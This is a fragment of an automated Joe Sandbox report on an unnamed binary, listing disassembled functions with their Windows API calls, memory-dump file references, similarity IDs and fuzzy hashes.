                                                                                                                                                        Function 00AD8355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8371
                                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD837F
                                                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00AD8387
                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00AD8391
                                                                                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00AD83CD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                                        • Opcode ID: 660e39f26c3e0fdbd219807e8ed9a835e8725bd4cae1e387baf3ae24df799ce3
                                                                                                                                                        • Instruction ID: 102b5be0eabdcf5c93516de384bf674b2a579c1c57e66c9d019e4f10286ecb8f
                                                                                                                                                        • Opcode Fuzzy Hash: 660e39f26c3e0fdbd219807e8ed9a835e8725bd4cae1e387baf3ae24df799ce3
                                                                                                                                                        • Instruction Fuzzy Hash: 08018C35C00619EBCF00AFA9ED48AEEBB78FF08B01F400042E506B7250CF789A60C7A1
                                                                                                                                                        Function 00ACA857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CLSIDFromProgID.COMBASE ref: 00ACA874
                                                                                                                                                        • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00ACA88F
                                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 00ACA89D
                                                                                                                                                        • CoTaskMemFree.COMBASE(00000000), ref: 00ACA8AD
                                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 00ACA8B9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                                        • Opcode ID: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                                                                                                                                                        • Instruction ID: 38e4ec63544c54f6787f5d6b435fb1b46fb5341b883ac6cd739fd30ecd99800d
                                                                                                                                                        • Opcode Fuzzy Hash: f341bdc28749cab9ef002dac96868d63a08b0ea5bcda22ad6819fe7ba8682fcb
                                                                                                                                                        • Instruction Fuzzy Hash: 7A014B76600218EFDB115F68EC84BAABBBDEF54799F158428B901D3210DB70DD419BA1
                                                                                                                                                        Function 00ACB78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00ACB7A5
                                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00ACB7AF
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00ACB7BE
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00ACB7C5
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00ACB7DB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                                        • Opcode ID: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                                                                                                                                                        • Instruction ID: 734bda5f732ae06615e42d70abfc479fe2830dfa585102a558899dce4417595b
                                                                                                                                                        • Opcode Fuzzy Hash: f6a103d3901d3b9a532067af6eef516b95d5f988a61c0fba11dd17e08027f7f3
                                                                                                                                                        • Instruction Fuzzy Hash: E4F0AF752412547FEB100FA4AC89FA73BACFF8A755F408019F950C7150CB619C018A70
                                                                                                                                                        Function 00ACB7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00ACB806
                                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB810
                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB81F
                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00ACB826
                                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00ACB83C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 47921759-0
                                                                                                                                                        • Opcode ID: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                                                                                                                                                        • Instruction ID: d826f8f89077748ac8adf52facfb8f32e59748bbb68543b0180f48d855da62a2
                                                                                                                                                        • Opcode Fuzzy Hash: 2b4e09408ae543c50cffae426f4961270eaeb9eec166b8d2926362422ed765cd
                                                                                                                                                        • Instruction Fuzzy Hash: 8AF03775210214AFEB215FA5EC99FAB3B6CFF4A754F008029F941D7150CFA198518B70
                                                                                                                                                        Function 00ACFA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00ACFA8F
                                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00ACFAA6
                                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00ACFABE
                                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00ACFADA
                                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00ACFAF4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                                        • Opcode ID: 6ad677ee1adb00251aafd2a3aed0adbd332b245be3a7f2c3d4e999e17212aeb0
                                                                                                                                                        • Instruction ID: d97e0c5f2295b8ef5c84db6954dfc6a0cd1bb9f56bd20ce18c17ab2acc050ae0
                                                                                                                                                        • Opcode Fuzzy Hash: 6ad677ee1adb00251aafd2a3aed0adbd332b245be3a7f2c3d4e999e17212aeb0
                                                                                                                                                        • Instruction Fuzzy Hash: 29018130500704AFEB259B14DD4EFD6B7BABB10B49F45416DB587A60E0DBF4A9448A50
                                                                                                                                                        Function 00AAB517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • EndPath.GDI32(?), ref: 00AAB526
                                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00B0F583,00000000,?), ref: 00AAB542
                                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00AAB555
                                                                                                                                                        • DeleteObject.GDI32 ref: 00AAB568
                                                                                                                                                        • StrokePath.GDI32(?), ref: 00AAB583
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                                        • Opcode ID: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                                                                                                                                                        • Instruction ID: e9b8deebff220724ed2c364bcbaba663ec5eb60f00ab9ae75d814617a1ecaf22
                                                                                                                                                        • Opcode Fuzzy Hash: c9cd417f6e348682d53104e76f81278b4f75067ee766a860833138447ffbe2b3
                                                                                                                                                        • Instruction Fuzzy Hash: 34F0EC30450705EBDB255F69ED0C7A43FE5B702327F548654E4AA8B1F1CB3489A5DF20
                                                                                                                                                        Function 00ADFA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00ADFAB2
                                                                                                                                                        • CoCreateInstance.COMBASE(00B1DA7C,00000000,00000001,00B1D8EC,?), ref: 00ADFACA
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • CoUninitialize.COMBASE ref: 00ADFD2D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                                        • String ID: .lnk
                                                                                                                                                        • API String ID: 2683427295-24824748
                                                                                                                                                        • Opcode ID: 40647e7cde5ee675a95887f83b14a6b5cfe4afce3f240d60892307e070d31ff6
                                                                                                                                                        • Instruction ID: 9c15fad10a67814eddd2b086eb9eca570320ec69fa6d78ba587cd4897ba751f4
                                                                                                                                                        • Opcode Fuzzy Hash: 40647e7cde5ee675a95887f83b14a6b5cfe4afce3f240d60892307e070d31ff6
                                                                                                                                                        • Instruction Fuzzy Hash: 5CA15D71604305AFC700EF64C991EABB7EDEF99704F40491DF1569B1A1EB70EA09CBA2
                                                                                                                                                        Function 00AADA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: #$+
                                                                                                                                                        • API String ID: 0-2552117581
                                                                                                                                                        • Opcode ID: e49a1d3282d5e4530bbcb08bba0ae45a450bb26ba6920db865c818a92995db83
                                                                                                                                                        • Instruction ID: d1812cc20e156dc930bbb69c2f6725dc5bfb31f8f492c87c4791b874f34213d6
                                                                                                                                                        • Opcode Fuzzy Hash: e49a1d3282d5e4530bbcb08bba0ae45a450bb26ba6920db865c818a92995db83
                                                                                                                                                        • Instruction Fuzzy Hash: 54511EB4604246CFDF11EF68C495AFA7BE4EF26310F144099FA929B2E0D7309D46CB20
                                                                                                                                                        Function 00AD503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00B2DC40,?,0000000F,0000000C,00000016,00B2DC40,?), ref: 00AD507B
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                          • Part of subcall function 00A9B8A7: _memmove.LIBCMT ref: 00A9B8FB
                                                                                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00AD50FB
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                                        • String ID: REMOVE$THIS
                                                                                                                                                        • API String ID: 2528338962-776492005
                                                                                                                                                        • Opcode ID: 6d0ff3b641b0224815ca9c8284d34579c9e0ee2fc4859afe0b4ebf441baea532
                                                                                                                                                        • Instruction ID: 62efb08cc4a7a08a025426840d86854a0a6e5067581d0861e2bfb575e0358bf5
                                                                                                                                                        • Opcode Fuzzy Hash: 6d0ff3b641b0224815ca9c8284d34579c9e0ee2fc4859afe0b4ebf441baea532
                                                                                                                                                        • Instruction Fuzzy Hash: 08417F35A00609AFCF05EF64C981AAEB7F5BF49304F04816AF856AB392DB349D41CB50
                                                                                                                                                        Function 00ACCF7F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AD4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACC9FE,?,?,00000034,00000800,?,00000034), ref: 00AD4D6B
                                                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ACCFC9
                                                                                                                                                          • Part of subcall function 00AD4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00ACCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00AD4D36
                                                                                                                                                          • Part of subcall function 00AD4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00AD4C90
                                                                                                                                                          • Part of subcall function 00AD4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CA0
                                                                                                                                                          • Part of subcall function 00AD4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00ACC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00AD4CB6
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD036
                                                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ACD083
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                                                        • Opcode ID: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                                                                                                                                                        • Instruction ID: 18b8890b91baeb8cc75bd9f3c069f00559e07d110256702948fa64ebb082f309
                                                                                                                                                        • Opcode Fuzzy Hash: c3d6cafbb4fa0786b1923ed02ce0998ea963adc1227f75b5d6f462896e2558db
                                                                                                                                                        • Instruction Fuzzy Hash: C9413E76900218BFDB10DFA4CD85FDEBBB8EF49700F108099EA56B7191DA706E45CB61
